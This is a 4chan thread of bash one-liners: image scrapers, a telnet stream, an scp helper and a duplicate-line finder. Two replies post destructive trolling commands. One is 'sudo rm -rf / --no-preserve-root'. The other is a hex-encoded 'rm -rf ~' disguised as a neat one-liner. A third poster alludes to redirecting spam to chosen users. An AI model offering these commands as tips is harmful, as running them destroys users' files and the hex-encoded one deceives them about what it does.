What are your favorite bash one-liners?for i in `curl >>>/s/17026471 | grep -oE //i.4cdn.org/s/[0-9]+.jpg`; do wget https:$i; done
4chan fucked up the formatting, here we go
>>57092260
I know this is a one-liner thread but, make it a function, waay betterpics() {
link="https"//boards.4chan.org/$1/thread/$2"
for i in `curl $link | grep /oE //i.4cdn.org/$1/[0-9].jpg`; do wget https:$i;
done
}
>>57092622
I fucked up, but, whatever
Bumptelnet towel.blinkenlights.nl
>>57092622
nice, dat code reuse
>>57092622
you should get a link as argument
>>57092260
>not using "$( )" notation
Why do people still use backticks?
>>57092646
>telnet towel.blinkenlights.nl
Thats so cool
REMINDER TO NEVER COPY ANYTHING YOU FIND ON 4CHAN AND PASTE IT ONTO YOUR TERMINAL
http://www.ush.it/team/ascii/hack-tricks_253C_CCC2008/wysinwyc/what_you_see_is_not_what_you_copy.txt
>>57092260sudo rm -rf / --no-preserve-root
>>57095341
wow nice esoteric knowledge you've clearly been a unix power user for decades
>>57093804
it's in a lot of tutorials and example code. Monkey see monkey do.
I didn't even know about $() until this Thursday when backticks didn't work for me
Is this the new Bash thread?
Not exactly a one-liner, but it's something I made to get stuff from my home folder on my home server via scp without typing out the full path (~/music/* instead of /home/lolita/music/*). I mostly just use it with some Debian emulator on my phone.export HOME=/path/to/home && scp -P <ssh-port> <username>@<host>:$1 $2 && export HOME=<default_home>
Stick it in /usr/local/bin (as, say, homescp) and then addalias homescp='source homescp'(to set global variables) and you've got a shit script that's only useful if you've got a shitty cheap Android like me.
>>57092260
this thread seems better than /sqt/ to ask this.
Is there a quick way on terminal to check on a whole list of plain text files inside a directory, compare them and output if a line repeats on different files? this with no input other than a directory or a list of files.
>>57095954(for i in *; do sort <$i | uniq; done) | sort | uniq -d
>>57092260
i would use a html cli parser like pup to extract data from html as that regex only gets jpgs, also you should consider usingxargs wgetinstead of that ugly for construct
>>57096053
I would just use wget -r to download 4chan.
>>57096053
Let's see your one-liner then
$(echo 726d202d7266207e0a | xxd -r -ps)
It looks kind of nice.
>>57096682curl >>>/wg/6732906 | pup 'div[class="fileText"] a attr{href}' | awk '{print "https:" $1}' | xargs wget
pup is a nice tool for cli to extract tag-specific data fom html which is semantically more precise than regex.xargs -p $n wgetspeeds this up by launching $n processes at the same time. Look at how much cleaner it is, you can read it straight from left to right without keeping a mental note that this happens in a loop or something. I think xargs is preferable to for loops in that exampl
>>57096771
Why don't you use the 4chan json API?
>>57096783
because that argument wasnt about what input to take, it was about how to process the filtered image links. of course you can use the api, but as a one-liner its meant to be simple. using the api necessitates parsing the JSON, which is too complicated to achieve with grep. Of course you can parse the API json via CLI and an external tool (like I use pup to work with the HTML), but again, that wasnt the point.
>>57096754
kek
>>57092260
I have one set up that modifies our spam filters to send extra junk mail to user(s) I specify in the one-liner. I'd rather not post the whole script as it might get me in trouble.
>>57096771
this is nice, thanks for the breakdown